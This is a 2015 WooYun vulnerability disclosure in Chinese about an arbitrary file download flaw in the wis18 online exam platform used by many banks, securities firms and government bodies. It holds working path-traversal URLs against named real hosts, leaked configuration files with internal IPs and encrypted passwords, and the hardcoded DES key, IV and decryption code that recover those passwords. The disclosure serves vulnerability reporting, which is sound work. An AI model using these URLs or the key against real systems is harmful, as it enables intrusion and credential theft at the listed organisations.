当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116106

漏洞标题:新风向通用考试平台影响金融/IT/电力通讯/教育/等行业(多家银行、证券企业)

相关厂商:深圳市新风向科技有限公司

漏洞作者: piaoye

提交时间:2015-05-25 23:04

修复时间:2015-08-28 00:52

公开时间:2015-08-28 00:52

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-30: 厂商已经确认,细节仅向厂商公开
2015-06-02: 细节向第三方安全合作伙伴开放
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

客户量巨大 信息量巨大 奇葩漏洞。。

详细说明:

服务厂商为:http://www.newvane.com.cn/ 但按照域名找到北京的http://www.wis18.com/ 两家公司是一个公司吧。
客户列表在:http://www.newvane.com.cn/index.php?ac=article&at=read&did=351

电力及通信行业	 
广东省移动 辽宁省移动
黑龙江电业局 浙江金华燃机电厂
粤电力东莞电厂 浙江省电信
苏州电力公司 上海电信培训中心
广东电力发展股份有限公司 中国联通总部
河南商丘供电局 浙江联通
中国广东核电集团 深圳市核电环通有限公司
中广核能源有限公司 中广核工程有限公司
海南省移动

IT及制造行业
中国海尔集团 深圳市宏电技术股份有限公司
华为技术有限公司 腾讯科技有限公司
金蝶国际软件集团有限公司 兰州瑞圣通信技术有限公司
德赛集团有限公司 济南新丰泽科技开发有限公司
洪都航空工业集团有限责任公司 中国国际海运集装箱集团有限公司
蓝微电子有限公司

金融行业
中国人民银行总行 中国平安保险集团
中国工商银行总行 中国人寿保险云南省分公司
招商银行总行 太平财产保险有限公司
中国银行总行 民安保险有限公司
交通银行总行 生命人寿保险有限公司
深圳发展银行总行 联合证券有限责任公司
宁夏银行总行 广发证券股份有限公司
中国民生银行总行 中投证券有限责任公司
上海农商行总行 光大证券股份有限公司
中国人民银行贵阳中心支行 德邦证券股份有限公司
中国人民银行济南中心分行 国元证券股份有限公司
中国工商银行杭州金融学院 国金证券股份有限公司
中国工商银行长春金融学院 英大证券有限责任公司
恒丰银行股份有限公司 爱建证券有限责任公司
招商银行电话银行中心 中原证券股份有限公司
济源农村商业银行 西南证券股份有限公司
中信银行深圳分行 中天证券有限责任公司
中信银行成都分行 招商证券股份有限公司
中信银行郑州分行 世纪证券有限责任公司
中信银行东莞分行 华林证券有限责任公司
中信银行青岛分行 众成证券经纪有限公司
深圳邮政储蓄银行 浙商证券有限责任公司
中国建设银行深圳分行 深圳证券交易所
中国农业银行客户服务中心 博时基金管理有限公司
上饶商业银行

政府及事业单位
中国南方航空股份有限公司 成都市成华区国税局
中国民航培训中心 广州盾建地下工程有限公司
四川乐山市地方税务局 香港中旅集团有限公司
江苏宿迁地方税务局 深圳市质量技术监督局
江苏宿迁公安局 富阳市委组织部
西安市地方税务局 海南省消防总队
中国税务信息网 广东省怀集监狱
河北邢台国家税务局 中国银行业监督管理委员会上海监管局
大连市国家税务局 中国银行业监督管理委员会新疆监管局
中国邮政湖北省公司培训中心 深圳市特种设备安全检验研究院
厦门市地方税务局 湖北省邮政培训中心
深圳市住房公积金管理中心 深圳航空股份有限公司


漏洞为任意文件下载漏洞,可导致各种信息泄露。很多在内网
以民生银行内部员工考试系统为例:
http://edu.cmbc.com.cn/wis18/file.showimage.flow?filename=../WEB-INF/web.xml
http://edu.cmbc.com.cn/wis18/file.showimage.flow?filename=../WEB-INF/lib/wis18.jar 源码包
/system/config/ds.xml 数据配置文件

<?xml version="1.0" encoding="utf-8"?>
<datasource>
<db>sqlserver</db>
<ip>192.168.100.70</ip>
<port>1433</port>
<databasename>onlineexam</databasename>
<connection-url>jdbc:sqlserver://192.168.100.2:1433;databasename=onlineexam</connection-url>
<driver-class>com.microsoft.sqlserver.jdbc.SQLServerDriver</driver-class>
<username>exam1</username>
<password>{DES}LoKRQ33l36TT+1HX1XtP4Q==</password>
<idleconnectiontestperiod>60</idleconnectiontestperiod>
<idlemaxage>240</idlemaxage>
<minconnectionsperpartition>60</minconnectionsperpartition>
<maxconnectionsperpartition>100</maxconnectionsperpartition>
<partitioncount>3</partitioncount>
<acquireincrement>10</acquireincrement>
<preparedstatementcachesize>100</preparedstatementcachesize>
<statementscachedperconnection>30</statementscachedperconnection>
<releasehelperthreads>3</releasehelperthreads>
<initsql>select * from s_sysid_tab</initsql>
</datasource>


system/config/manauser.xml 管理员账号密码

<?xml version="1.0" encoding="utf-8"?>
<system>
<username>admin</username>
<password>{DES}RBCpec7d8g1ViNgpFMM8Tg==</password>
</system>


因为密码都是des加密的 所以编译后找到deskey

public static void main(String[] args) {
try {
System.out.println(desDecrypt("c3BathaFi8t7Oi0JBiWLHQ=="));
} catch (Exception ex) {
ex.printStackTrace();
}
}
static
{
try
{
encipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
decipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
String strDesKey = "Wis@1/-G&od=";
String strDesIV = "No1&>A$:Sys=";
BASE64Decoder b = new BASE64Decoder();
desKeySpec = new DESKeySpec(b.decodeBuffer(strDesKey));
SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("DES");
secretKey = keyFactory.generateSecret(desKeySpec);
iv = new IvParameterSpec(b.decodeBuffer(strDesIV));
encipher.init(1, secretKey, iv);
decipher.init(2, secretKey, iv);
} catch (Exception e) {
e.printStackTrace();
}

漏洞证明:

其他客户:
上海银行:http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../system/config/manauser.xml
海尔:http://haierhr.ct-edu.com.cn/wis18/file.showimage.flow?filename=../system/config/manauser.xml
http://www.sdchuxin.com/wis18/file.showimage.flow?filename=../system/config/manauser.xml
广发证券:http://121.8.153.10/wis18/file.showimage.flow?filename=../system/config/manauser.xml
工商银行http://80.34.174.3/wis18/ 貌似不能外网访问。

修复方案:

联系厂商进行紧急升级,对文件下载参数进行验证处理 最好实现虚拟路径直接下载 类似url/1.LOG

版权声明:转载请注明来源 piaoye@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-30 00:52

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报,同时涉及的案例已经转由CNCERT向银监会通报。

最新状态:

暂无